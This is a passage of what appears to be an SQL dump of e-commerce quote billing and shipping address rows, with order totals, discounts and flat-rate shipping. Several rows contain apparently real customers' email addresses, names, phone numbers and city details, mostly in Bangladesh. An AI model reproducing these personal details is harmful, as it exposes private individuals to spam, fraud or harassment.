(51, 21, '2021-04-26 22:18:01', '2021-04-26 22:18:01', 8, 0, NULL, 'billing', 'totewinthropbirrueta@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(52, 21, '2021-04-26 22:18:01', '2021-04-26 22:18:01', 8, 0, NULL, 'shipping', 'totewinthropbirrueta@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(53, 22, '2021-04-29 01:27:50', '2021-04-29 01:27:50', 9, 0, NULL, 'billing', 'knowable1975finnfinn@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(54, 22, '2021-04-29 01:27:50', '2021-04-29 01:27:50', 9, 0, NULL, 'shipping', 'knowable1975finnfinn@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(55, 23, '2021-05-02 11:04:56', '2021-05-02 11:04:56', 10, 0, NULL, 'billing', 'sarkar.sajib@rocketmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(56, 23, '2021-05-02 11:04:56', '2021-05-02 11:04:56', 10, 0, NULL, 'shipping', 'sarkar.sajib@rocketmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(57, 24, '2021-05-03 08:28:41', '2021-05-03 08:28:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(58, 24, '2021-05-03 08:28:41', '2021-05-03 08:28:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 4.0000, 964.0000, 964.0000, 771.2000, 771.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -192.8000, -192.8000, 771.2000, 771.2000, NULL, '[]', NULL, 0.0000, 0.0000, 964.0000, 964.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(59, 25, '2021-05-11 05:11:40', '2021-05-11 05:11:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(60, 25, '2021-05-11 05:11:40', '2021-05-11 05:11:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(61, 26, '2021-05-12 07:43:48', '2021-05-12 07:43:48', 11, 0, NULL, 'billing', 'simonmccarthy9355@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(62, 26, '2021-05-12 07:43:48', '2021-05-12 07:43:48', 11, 0, NULL, 'shipping', 'simonmccarthy9355@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(63, 27, '2021-05-22 07:32:18', '2021-05-22 07:32:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(64, 27, '2021-05-22 07:32:18', '2021-05-22 07:32:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(65, 28, '2021-05-27 14:47:15', '2021-05-27 14:47:15', 12, 0, NULL, 'billing', 'subcomponentraleigh@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(66, 28, '2021-05-27 14:47:15', '2021-05-27 14:47:15', 12, 0, NULL, 'shipping', 'subcomponentraleigh@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(67, 29, '2021-06-05 17:43:16', '2021-06-05 17:43:16', 13, 0, NULL, 'billing', 'paulwoods8093@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(68, 29, '2021-06-05 17:43:16', '2021-06-05 17:43:16', 13, 0, NULL, 'shipping', 'paulwoods8093@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(69, 30, '2021-06-07 04:10:03', '2021-06-07 04:10:03', NULL, 0, NULL, 'billing', NULL, NULL, 'Rasel', NULL, 'Md.', NULL, NULL, 'Test', 'Dhaka', NULL, NULL, '1213', 'BD', '01715568606', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(70, 30, '2021-06-07 04:10:03', '2021-06-07 04:12:53', NULL, 0, NULL, 'shipping', NULL, NULL, 'Rasel', NULL, 'Md.', NULL, NULL, 'Test', 'Dhaka', NULL, NULL, '1213', 'BD', '01715568606', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 59.0000, 59.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(71, 31, '2021-06-08 10:57:44', '2021-06-08 10:57:44', 14, 0, NULL, 'billing', 'masum4mina@gmail.com', NULL, 'masum', NULL, 'Mina', NULL, 'est', 'Mirpur', 'Dhaka', NULL, NULL, '1200', 'BD', '01963259845', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(72, 31, '2021-06-08 10:57:44', '2021-06-08 12:01:18', 14, 0, NULL, 'shipping', 'masum4mina@gmail.com', NULL, 'masum', NULL, 'Mina', NULL, 'est', 'Mirpur', 'Dhaka', NULL, NULL, '1200', 'BD', '01963259845', NULL, 1, 1, 'flatrate_flatrate', 'Flat Rate - Fixed', 401.0000, 678.0000, 678.0000, 542.4000, 542.4000, 0.0000, 0.0000, 25.0000, 25.0000, 0.0000, 0.0000, -135.6000, -135.6000, 567.4000, 567.4000, NULL, '[]', NULL, 0.0000, 0.0000, 678.0000, 678.0000, 0.0000, 0.0000, 0.0000, NULL, 25.0000, 25.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(73, 32, '2021-06-09 03:59:26', '2021-06-09 03:59:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(74, 32, '2021-06-09 03:59:26', '2021-06-09 03:59:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 2397.0000, 2397.0000, 1917.6000, 1917.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -479.4000, -479.4000, 1917.6000, 1917.6000, NULL, '[]', NULL, 0.0000, 0.0000, 2397.0000, 2397.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(75, 33, '2021-06-09 06:43:12', '2021-06-09 06:43:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(76, 33, '2021-06-09 06:43:12', '2021-06-09 06:43:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(77, 34, '2021-06-09 08:39:09', '2021-06-09 08:39:09', NULL, 0, NULL, 'billing', NULL, NULL, 'Mohammad', NULL, 'Aktaruzzaman', NULL, 'http://echosystech.com/', 'ppppp', 'Newyork', 'California', 12, '12345', 'US', '+8801911854726', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(78, 34, '2021-06-09 08:39:09', '2021-06-09 08:40:33', NULL, 0, NULL, 'shipping', NULL, NULL, 'Mohammad', NULL, 'Aktaruzzaman', NULL, 'http://echosystech.com/', 'ppppp', 'Newyork', 'California', 12, '12345', 'US', '+8801911854726', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 1286.0000, 1286.0000, 1028.8000, 1028.8000, 0.0000, 0.0000, 10.0000, 10.0000, 0.0000, 0.0000, -257.2000, -257.2000, 1038.8000, 1038.8000, NULL, '[]', NULL, 0.0000, 0.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, 0.0000, NULL, 10.0000, 10.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(79, 35, '2021-06-09 11:59:41', '2021-06-09 11:59:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(80, 35, '2021-06-09 11:59:41', '2021-06-09 11:59:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(81, 36, '2021-06-12 02:59:35', '2021-06-12 02:59:35', 15, 0, NULL, 'billing', 'jb5474452@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(82, 36, '2021-06-12 02:59:35', '2021-06-12 02:59:35', 15, 0, NULL, 'shipping', 'jb5474452@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(83, 37, '2021-06-15 12:31:32', '2021-06-15 12:31:32', NULL, 0, NULL, 'billing', NULL, NULL, 'Mohammad', NULL, 'Aktaruzzaman', NULL, 'http://echosystech.com/', 'ppppp', 'Newyork', NULL, NULL, '12345', 'SY', '+8801911854726', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(84, 37, '2021-06-15 12:31:32', '2021-06-15 12:32:37', NULL, 0, NULL, 'shipping', NULL, NULL, 'Mohammad', NULL, 'Aktaruzzaman', NULL, 'http://echosystech.com/', 'ppppp', 'Newyork', NULL, NULL, '12345', 'BD', '+8801911854726', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(85, 38, '2021-06-16 06:45:35', '2021-06-16 06:45:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(86, 38, '2021-06-16 06:45:35', '2021-06-16 06:45:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 6.0000, 1404.0000, 1404.0000, 1123.2000, 1123.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -280.8000, -280.8000, 1123.2000, 1123.2000, NULL, '[]', NULL, 0.0000, 0.0000, 1404.0000, 1404.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(87, 39, '2021-06-16 12:03:49', '2021-06-16 12:03:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(88, 39, '2021-06-16 12:03:49', '2021-06-16 12:03:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 5.0000, 555.0000, 555.0000, 444.0000, 444.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -111.0000, -111.0000, 444.0000, 444.0000, NULL, '[]', NULL, 0.0000, 0.0000, 555.0000, 555.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(89, 40, '2021-06-27 11:43:01', '2021-06-27 11:43:01', 16, 0, NULL, 'billing', 'fittsdot@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(90, 40, '2021-06-27 11:43:01', '2021-06-27 11:43:01', 16, 0, NULL, 'shipping', 'fittsdot@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(91, 41, '2021-10-18 05:27:59', '2021-10-18 05:27:59', 17, 0, NULL, 'billing', 'lottiuxxuv72@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(92, 41, '2021-10-18 05:27:59', '2021-10-18 05:27:59', 17, 0, NULL, 'shipping', 'lottiuxxuv72@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(93, 42, '2021-10-27 14:02:08', '2021-10-27 14:02:08', 18, 0, NULL, 'billing', 'athenabsafd81@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(94, 42, '2021-10-27 14:02:08', '2021-10-27 14:02:08', 18, 0, NULL, 'shipping', 'athenabsafd81@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(95, 43, '2021-11-06 09:04:50', '2021-11-06 09:04:50', 19, 0, NULL, 'billing', 'summersroger9@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
